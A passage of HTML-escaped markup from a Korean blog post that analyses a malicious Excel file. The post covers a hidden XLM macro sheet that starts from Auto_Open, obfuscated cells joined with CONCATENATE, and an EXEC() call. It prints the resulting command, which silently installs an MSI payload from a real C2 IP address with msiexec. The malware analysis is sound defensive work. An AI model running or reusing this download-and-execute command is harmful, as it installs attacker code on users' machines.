#333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;수&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;있습니다&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-filename=&quot;4.png&quot; data-origin-width=&quot;1183&quot; data-origin-height=&quot;739&quot; width=&quot;600&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c2QAnF/btqDgy0NAEQ/scKzREYN9JsNwFCqgPZIj1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c2QAnF/btqDgy0NAEQ/scKzREYN9JsNwFCqgPZIj1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c2QAnF/btqDgy0NAEQ/scKzREYN9JsNwFCqgPZIj1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc2QAnF%2FbtqDgy0NAEQ%2FscKzREYN9JsNwFCqgPZIj1%2Fimg.png&quot; data-filename=&quot;4.png&quot; data-origin-width=&quot;1183&quot; data-origin-height=&quot;739&quot; width=&quot;600&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;해당&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;악성&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;문서는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;엑셀&amp;nbsp;4.0&amp;nbsp;(XLM)&amp;nbsp;매크로&amp;nbsp;시트를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;이용하고&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;그&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;시트를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;숨기는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;특징을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;지녔고&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;최초&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;배포된&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;파일과는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;다르게&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;엑셀&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;매크로에&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;난독화를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;적용하기&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;시작합니다&lt;/span&gt;&lt;span&gt;. 시트 위치에 우 클릭하여 &lt;/span&gt;&lt;span&gt;숨기기를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;취소하게&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;되면&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;숨겨진&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;시트&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;하나가&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;발견이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;되며&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;매크로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;시트임을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;확인할&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;수&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;있습니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-filename=&quot;5.png&quot; data-origin-width=&quot;859&quot; data-origin-height=&quot;693&quot; width=&quot;600&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cgeicn/btqDhuQ8ZEr/tWMkB3GeSCGvGLnZPf7Ji1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cgeicn/btqDhuQ8ZEr/tWMkB3GeSCGvGLnZPf7Ji1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cgeicn/btqDhuQ8ZEr/tWMkB3GeSCGvGLnZPf7Ji1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcgeicn%2FbtqDhuQ8ZEr%2FtWMkB3GeSCGvGLnZPf7Ji1%2Fimg.png&quot; data-filename=&quot;5.png&quot; data-origin-width=&quot;859&quot; data-origin-height=&quot;693&quot; width=&quot;600&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-filename=&quot;6.png&quot; data-origin-width=&quot;327&quot; data-origin-height=&quot;232&quot; width=&quot;450&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cULR8k/btqDj2eMTXS/5hQHXFPr8c8AcbLsIGLaY0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cULR8k/btqDj2eMTXS/5hQHXFPr8c8AcbLsIGLaY0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cULR8k/btqDj2eMTXS/5hQHXFPr8c8AcbLsIGLaY0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcULR8k%2FbtqDj2eMTXS%2F5hQHXFPr8c8AcbLsIGLaY0%2Fimg.png&quot; data-filename=&quot;6.png&quot; data-origin-width=&quot;327&quot; data-origin-height=&quot;232&quot; width=&quot;450&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-filename=&quot;7.png&quot; data-origin-width=&quot;475&quot; data-origin-height=&quot;719&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b8KYJo/btqDj3LxtRa/JsqKMhwP97MSStfufzfHOk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b8KYJo/btqDj3LxtRa/JsqKMhwP97MSStfufzfHOk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b8KYJo/btqDj3LxtRa/JsqKMhwP97MSStfufzfHOk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb8KYJo%2FbtqDj3LxtRa%2FJsqKMhwP97MSStfufzfHOk%2Fimg.png&quot; data-filename=&quot;7.png&quot; data-origin-width=&quot;475&quot; data-origin-height=&quot;719&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;font-size: 1.12em;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;font-size: 1.12em;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;font-size: 1.12em;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span&gt;4.2 &lt;/span&gt;&lt;span&gt;난독화&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;코드&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;분석&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;해당&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;시트의&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;이름 상자를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;보면&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;Auto_Open&amp;nbsp;등으로&amp;nbsp;이름이&amp;nbsp;지정이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;되어&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;있습니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;span&gt;만약&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;그&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;부분이 없을 경우 A1 셀의 수식을 첫 번째로 실행하게&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;되며&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;세로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;방향으로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;매크로가&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;실행됩니다&lt;/span&gt;&lt;span&gt;.&lt;br /&gt;&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; width=&quot;600&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bZ0IkZ/btqDiGKkXHk/7tL8p18EclCkuU3dyjKeZ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bZ0IkZ/btqDiGKkXHk/7tL8p18EclCkuU3dyjKeZ0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bZ0IkZ/btqDiGKkXHk/7tL8p18EclCkuU3dyjKeZ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbZ0IkZ%2FbtqDiGKkXHk%2F7tL8p18EclCkuU3dyjKeZ0%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; width=&quot;600&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;매크로가&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;단계별로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;진행되면서&amp;nbsp;&amp;lsquo;Macro1&amp;rsquo;과&amp;nbsp;&amp;lsquo;Macro2&amp;rsquo;와&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;같이&amp;nbsp;지정된&amp;nbsp;셀을&amp;nbsp;호출&amp;nbsp;분기&amp;nbsp;흐름이&amp;nbsp;변경되고&lt;/span&gt;&lt;span&gt;,&lt;/span&gt;&lt;span&gt; 분기하게 되면 이전까지 실행된 루틴을 저장&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;후&amp;nbsp;새로운&amp;nbsp;콜&amp;nbsp;스택을&amp;nbsp;생성합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&amp;nbsp;그리고&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;해당 열에서 아래 방향으로 RETURN 될 때&lt;/span&gt;&lt;span&gt;까지 실행합니다&lt;/span&gt;&lt;span&gt;. 그러면&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;&amp;nbsp;아래와&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;같이&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;매크로를&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;한&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;단계씩&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;코드를&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;실행하여&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;분기&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;흐름을&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;파악합니다&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot;&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-filename=&quot;8.png&quot; data-origin-width=&quot;663&quot; data-origin-height=&quot;413&quot; width=&quot;600&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ckZcwx/btqDjGXlZvY/T81G4ou9hIUjM9QUMSoMkk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ckZcwx/btqDjGXlZvY/T81G4ou9hIUjM9QUMSoMkk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ckZcwx/btqDjGXlZvY/T81G4ou9hIUjM9QUMSoMkk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FckZcwx%2FbtqDjGXlZvY%2FT81G4ou9hIUjM9QUMSoMkk%2Fimg.png&quot; data-filename=&quot;8.png&quot; data-origin-width=&quot;663&quot; data-origin-height=&quot;413&quot; width=&quot;600&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; width=&quot;600&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b4lguU/btqDhvJewDN/UIQlSE91fkA3KbknBDndhk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b4lguU/btqDhvJewDN/UIQlSE91fkA3KbknBDndhk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b4lguU/btqDhvJewDN/UIQlSE91fkA3KbknBDndhk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb4lguU%2FbtqDhvJewDN%2FUIQlSE91fkA3KbknBDndhk%2Fimg.png&quot; data-origin-width=&quot;0&quot; data-origin-height=&quot;0&quot; width=&quot;600&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;아래의&lt;/span&gt;&lt;span&gt; 'A14' &lt;/span&gt;&lt;span&gt;셀까지&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;매크로가&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;진행되면&lt;/span&gt;&lt;span&gt; '&lt;/span&gt;&lt;span&gt;EXEC(&amp;nbsp;)&lt;/span&gt;&lt;span&gt;'&lt;/span&gt;&lt;span&gt;라는&amp;nbsp;개별&amp;nbsp;프로그램을&amp;nbsp;실행하는&amp;nbsp;함수를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;이용해&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;해당&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;시트의&lt;/span&gt;&lt;span&gt; 'A30'&lt;/span&gt;&lt;span&gt;셀의&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;값을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;실행합니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-filename=&quot;10.png&quot; data-origin-width=&quot;428&quot; data-origin-height=&quot;366&quot; width=&quot;600&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/uduHU/btqDfCP4UjB/sJunrNzii6mnSfkWrAO1yK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/uduHU/btqDfCP4UjB/sJunrNzii6mnSfkWrAO1yK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/uduHU/btqDfCP4UjB/sJunrNzii6mnSfkWrAO1yK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FuduHU%2FbtqDfCP4UjB%2FsJunrNzii6mnSfkWrAO1yK%2Fimg.png&quot; data-filename=&quot;10.png&quot; data-origin-width=&quot;428&quot; data-origin-height=&quot;366&quot; width=&quot;600&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;'A30'&lt;/span&gt;&lt;span&gt;셀에서는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;여러 개의 범위 또는 여러 개의 텍스트 문자열을 하나의 텍스트 문자열로 연결&lt;/span&gt;&lt;span&gt;하는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;CONCATENATE&lt;/span&gt;&lt;span&gt; 함수를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;사용하여&lt;/span&gt;&lt;span&gt; 3&lt;/span&gt;&lt;span&gt;개의&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;셀의&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;문자열을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;합쳐줍니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-filename=&quot;11.png&quot; data-origin-width=&quot;564&quot; data-origin-height=&quot;273&quot; width=&quot;600&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dyVbwI/btqDjeNw8pM/Wv9D2SuWcmK7CMYGtSIaR1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dyVbwI/btqDjeNw8pM/Wv9D2SuWcmK7CMYGtSIaR1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dyVbwI/btqDjeNw8pM/Wv9D2SuWcmK7CMYGtSIaR1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdyVbwI%2FbtqDjeNw8pM%2FWv9D2SuWcmK7CMYGtSIaR1%2Fimg.png&quot; data-filename=&quot;11.png&quot; data-origin-width=&quot;564&quot; data-origin-height=&quot;273&quot; width=&quot;600&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;결과적으로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;아래와&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;같은&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;명령어가&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;완성됩니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;span&gt;이때&lt;/span&gt;&lt;span&gt; '&lt;/span&gt;&lt;span&gt;msiexec.exe&lt;/span&gt;&lt;span&gt;'&lt;/span&gt;&lt;span&gt;는&lt;/span&gt;&lt;span&gt; Windows Installer &lt;/span&gt;&lt;span&gt;유틸리티의&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;일부로&lt;/span&gt;&lt;span&gt; msi &lt;/span&gt;&lt;span&gt;나&lt;/span&gt;&lt;span&gt; msp &lt;/span&gt;&lt;span&gt;패키지를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;설치&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;시&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;사용됩니다&lt;/span&gt;&lt;span&gt;. &lt;/span&gt;&lt;span&gt;이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;과정을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;통해&lt;/span&gt;&lt;span&gt; C2 &lt;/span&gt;&lt;span&gt;서버에서&lt;/span&gt;&lt;span&gt; MSI &lt;/span&gt;&lt;span&gt;파일을&lt;/span&gt;&lt;span&gt; '%TEMP%' &lt;/span&gt;&lt;span&gt;환경변수의&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;경로인&lt;/span&gt;&lt;span&gt; '&lt;/span&gt;&lt;span&gt;C:\Users\&lt;/span&gt;&lt;span&gt;[&lt;/span&gt;&lt;span&gt;계정명&lt;/span&gt;&lt;span&gt;]&lt;/span&gt;&lt;span&gt;\AppData\Local\Temp&lt;/span&gt;&lt;span&gt;'&lt;/span&gt;&lt;span&gt;위치에&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;다운로드하는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;명령이&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;수행될&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;것을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;암시할&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;수&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;있습니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;pre id=&quot;code_1586360219626&quot; class=&quot;python&quot; data-ke-language=&quot;python&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;msiexec.exe RETURN=185 /i http://185.128.213.12/rol1 /q ksw='%TEMP%'&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;만약&lt;/span&gt;&lt;span&gt; '&lt;/span&gt;&lt;span&gt;콘텐츠&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;사용&lt;/span&gt;&lt;span&gt;' &lt;/span&gt;&lt;span&gt;버튼을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;클릭&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;또는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;한&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;단계씩으로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;매크로를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;실행했다면&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;Sysinternals Suite &lt;/span&gt;&lt;span&gt;유틸리티 중 하나인&lt;/span&gt;&lt;span&gt; process explorer&lt;/span&gt;&lt;span&gt;를&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;통해&lt;/span&gt;&lt;span&gt; '&lt;/span&gt;&lt;span&gt;msiexec.exe&lt;/span&gt;&lt;span&gt;' &lt;/span&gt;&lt;span&gt;프로세스가&lt;/span&gt;&lt;span&gt; EXCEL.EXE &lt;/span&gt;&lt;span&gt;하위&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;프로세스로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;동작함을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;확인할&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;수&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;있고&lt;/span&gt;&lt;span&gt;, C2 &lt;/span&gt;&lt;span&gt;서버로&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;통신하는&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;것을&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;확인할&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;수&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;있습니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-filename=&quot;12.png&quot; data-origin-width=&quot;785&quot; data-origin-height=&quot;586&quot; width=&quot;600&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dDywY7/btqDgy7zCKF/aMQtmcHil4tkfqqhwTL2iK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dDywY7/btqDgy7zCKF/aMQtmcHil4tkfqqhwTL2iK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dDywY7/btqDgy7zCKF/aMQtmcHil4tkfqqhwTL2iK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdDywY7%2FbtqDgy7zCKF%2FaMQtmcHil4tkfqqhwTL2iK%2Fimg.png&quot; data-filename=&quot;12.png&quot; data-origin-width=&quot;785&quot; data-origin-height=&quot;586&quot; width=&quot;600&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p&gt;&lt;span&gt;&amp;nbsp; &lt;/span&gt;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #ef5369;&quot;&gt;&lt;b&gt;5. 결과&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
